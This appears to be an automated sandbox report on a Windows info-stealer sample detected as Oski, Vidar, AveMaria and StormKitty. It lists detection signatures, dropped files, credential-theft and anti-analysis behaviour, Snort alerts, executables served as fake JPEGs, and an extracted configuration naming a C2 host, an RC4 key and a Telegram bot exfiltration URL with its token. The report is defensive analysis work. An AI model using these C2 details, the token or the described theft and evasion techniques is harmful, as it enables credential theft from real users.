Windows Analysis Report 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Overview

General Information

Sample Name: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Analysis ID: 553216
MD5: 39bfd2ce7cffeafc8f4d85d89fd6f072
SHA1: 9d0df13ef8de579a2bbfba88e938a836ffab1069
SHA256: 18719d6856a09a622001f1c325067d56afa63bd21fbad25fd23c01b2c0c67472
Tags: exe, OskiStealer

Detection

AveMaria, Oski Stealer, Redline Clipper, StormKitty, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Redline Clipper
Sigma detected: Capture Wi-Fi password
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Oski Stealer
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Yara detected Vidar stealer
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Downloads files with wrong headers with respect to MIME Content-Type
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Posts data to a JPG file (protocol mismatch)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal WLAN passwords
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Avira: detection malicious, Label: TR/Agent.pyynm
Source: C:\Users\user\AppData\Local\Temp\dll.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\ProgramData\AMD Driver\taskshell.exe Avira: detection malicious, Label: HEUR/AGEN.1124739
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Avira: detection malicious, Label: HEUR/AGEN.1209556
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Avira: detection malicious, Label: TR/AD.Chapak.dvwuj
Found malware configuration
Source: 6.2.chormuimii.exe.4af0000.10.unpack Malware Configuration Extractor: Oski {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: 6.2.chormuimii.exe.4af0000.10.unpack Malware Configuration Extractor: Vidar {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: chormuim.exe.6504.8.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/sendMessage"}
Multi AV Scanner detection for submitted file
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Virustotal: Detection: 70%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Metadefender: Detection: 31%
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe ReversingLabs: Detection: 74%
Antivirus / Scanner detection for submitted sample
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Avira: detected
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\AMD Driver\taskshell.exe Metadefender: Detection: 40%
Source: C:\ProgramData\AMD Driver\taskshell.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Metadefender: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dll.exe Joe Sandbox ML: detected
Source: C:\ProgramData\AMD Driver\taskshell.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.dll.exe.10000.0.unpack Avira: Label: TR/ATRAPS.Gen
Source: 6.0.chormuimii.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 6.2.chormuimii.exe.4b5ec00.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.chormuimii.exe.2406b90.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.dll.exe.10000.0.unpack Avira: Label: TR/ATRAPS.Gen
Source: 6.2.chormuimii.exe.4c0fb62.11.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CB10 CryptUnprotectData,LocalAlloc,LocalFree, 4_2_00B8CB10
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 4_2_00B8C900
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 4_2_00B8CBA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CD30 _malloc,_malloc,CryptUnprotectData, 4_2_00B8CD30
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 4_2_00B8EED0
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5ED9 CryptUnprotectData, 8_2_00007FFC089D5ED9

Compliance:

Uses 32bit PE files
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mswsock.pdb& source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: imm32.pdbB source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: DotNetZip.dll.8.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdbDD source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: nsi.pdbK_ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp
Source: Binary string: System.Management.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdbT source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: _.pdb source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source: Binary string: version.pdbx source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: ws2_32.pdb! source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source: Binary string: oleaut32.pdbA source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb; source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: lib.pdb.0 source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Drawing.pdb source: WER5768.tmp.dmp.29.dr
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb0 source: WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdbn source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fwpuclnt.pdb, source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msctf.pdbF source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: msvcr120_clr0400.amd64.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemcomn.pdbi source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdbP source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8F6B0 FindFirstFileExW, 4_2_00B8F6B0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4x nop then add esp, 04h 4_2_00B93050

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49743 -> 108.167.165.140:80
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=75 Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:22 GMT Server: Apache Last-Modified: Mon, 07 Aug 2017 00:52:20 GMT Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:23 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:00:58 GMT Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:20 GMT Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=72 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:24 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:30 GMT Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:25 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=70 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 